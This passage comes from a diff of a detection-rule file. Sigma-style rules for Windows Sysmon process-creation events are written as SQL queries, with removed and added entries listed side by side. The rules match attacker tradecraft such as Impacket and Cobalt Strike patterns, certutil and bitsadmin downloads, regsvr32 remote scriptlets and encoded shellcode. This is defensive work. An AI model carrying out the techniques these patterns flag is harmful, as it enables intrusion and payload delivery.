'%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects creation of a scheduled task with a GUID like name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software naming their tasks as GUIDs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", - "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", + "status": "test", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "status": "test", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Administrative findstr usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Non Interactive PowerShell Process Spawned", + "id": "f4bbd493-b796-416e-bbf2-121235348529", + "status": "test", + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "System administrator usage" + "Legitimate programs executing PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentImage LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_powershell_non_interactive_execution.yml" }, { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "title": "Suspicious Shells Spawn by Java 